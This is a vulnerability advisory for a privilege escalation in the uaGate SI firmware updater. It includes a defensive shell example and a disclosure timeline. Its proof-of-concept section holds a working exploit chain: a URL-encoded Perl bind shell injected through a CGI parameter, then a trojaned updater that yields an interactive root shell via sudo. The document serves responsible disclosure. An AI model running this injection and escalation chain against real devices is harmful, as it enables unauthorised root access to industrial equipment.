The uaGate's firmware update script, which the web server user calls via sudo, handles its parameters in an unsafe fashion. Along with a legitimate firmware image, a second firmware file can be supplied to the script. That second file can be crafted to simply overwrite the very same firmware update script that installs it. When the firmware update script is called again, it executes the payload supplied in the malicious firmware update with superuser rights.
An attacker who has already gained the ability to execute code on the device can use this issue to gain superuser rights.
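The two weaknesses described above are a parameter that is treated as a whitespace-separated file list and an unpack step that lands in the updater's own directory. The following is an added example of how a sudo-invoked updater can reject both patterns; it is not Softing's updateFirmware script, and STAGING_DIR, UPDATER_PATH, validate_image_arg, safe_output_path and install_image are assumed names.

```shell
#!/bin/sh
# Added example (not the vendor's updateFirmware): argument handling for a
# firmware updater that root runs via sudo. Assumed names: STAGING_DIR,
# UPDATER_PATH, validate_image_arg, safe_output_path, install_image.
set -eu

STAGING_DIR="${STAGING_DIR:-/var/lib/firmware-staging}"  # assumed; never the script's own dir
UPDATER_PATH="${UPDATER_PATH:-$0}"                       # path of the script protecting itself

# Accept exactly one plain "<name>.bz2" file name. A space-separated list,
# a path, a hidden file or any shell metacharacter is rejected outright.
validate_image_arg() {
    [ "$#" -eq 1 ] || return 1
    case "$1" in
        ''|.*|*/*)                                   return 1 ;;  # empty, hidden, path component
        *[[:space:]]*|*'$'*|*'`'*|*';'*|*'&'*|*'|'*) return 1 ;;  # word splitting / shell syntax
        *.bz2)                                       return 0 ;;
        *)                                           return 1 ;;
    esac
}

# Where the decompressed image may land: always inside STAGING_DIR and never
# under the updater's own name, so "updateFirmware.bz2" cannot replace the script.
safe_output_path() {
    img_name="${1%.bz2}"
    [ "$img_name" != "$(basename "$UPDATER_PATH")" ] || return 1
    printf '%s/%s\n' "$STAGING_DIR" "$img_name"
}

# Entry point for the real updater: validate, unpack into staging, then verify
# the image (vendor signature check, assumed) before anything reaches a system path.
install_image() {
    validate_image_arg "$@" || { echo "rejected image argument" >&2; return 2; }
    img_dest="$(safe_output_path "$1")" || { echo "image would replace updater" >&2; return 2; }
    bzip2 -dc -- "$STAGING_DIR/$1" > "$img_dest"
    # signature verification of "$img_dest" belongs here, before installation
    printf '%s\n' "$img_dest"
}
```

The updater's own entry point would call `install_image "$1"`; the functions are kept separate so they can be sourced and tested without root.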
Proof of concept details
PoC #1 (mitigated in 1.71.00.1225)
```bash
# deploy a remote bind shell (using cve-2019-11527)
curl --silent --user itadmin:******** 'http://uagate/cgi-bin/it/registerAzureIotProxy.cgi?task=register&deviceId=%26perl%20-e%20%27use%20Socket%3B%24p%3D4223%3Bsocket%28S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname%28%22tcp%22%29%29%3Bbind%28S%2Csockaddr_in%28%24p%2C%20INADDR_ANY%29%29%3Blisten%28S%2CSOMAXCONN%29%3Bfor%28%3B%24p%3Daccept%28C%2CS%29%3Bclose%20C%29%7Bopen%28STDIN%2C%22%3E%26C%22%29%3Bopen%28STDOUT%2C%22%3E%26C%22%29%3Bopen%28STDERR%2C%22%3E%26C%22%29%3Bexec%28%22%2Fbin%2Fbash%20-i%22%29%3B%7D%3B%27%26'

# connect to the uagate shell
ncat uagate 4223

# get a proper tty
python -c "import pty; pty.spawn('/bin/bash')"

# start proof of concept
echo '#!/bin/bash' > /tmp/updateFirmware
echo 'if [ "$1" == "--interactive" ]; then bash; fi;' >> /tmp/updateFirmware
cat /usr/local/bin/updateFirmware >> /tmp/updateFirmware
chmod +x /tmp/updateFirmware
busybox bzip2 /tmp/updateFirmware

# next step requires writing to /usr/local/bin (cve-2019-11528)
mv /tmp/updateFirmware.bz2 /usr/local/bin/updateFirmware.bz2
cd /usr/local/bin/
echo "just a trash file to nudge the update script" > trash.bz2
sudo ./updateFirmware "updateFirmware.bz2 trash.bz2"
sudo ./updateFirmware --interactive
```
- day 0 - pentest of uaGate SI Device - 21.12.2018
- day 28 - initial issue related contact to manufacturer - 18.01.2019
- day 63 - issue report to manufacturer - 22.02.2019
- day 66 - secure communication channel established - 25.02.2019
- day 74 - detailed issue report to manufacturer - 05.03.2019
- day 116 - manufacturer acknowledged security issues - 16.04.2019
- day 125 - CVE ID issued by MITRE - 25.04.2019
- day 229 - mitigation found in 1.71.00.1225 - 07.08.2019
- day 293 - released - 10.10.2019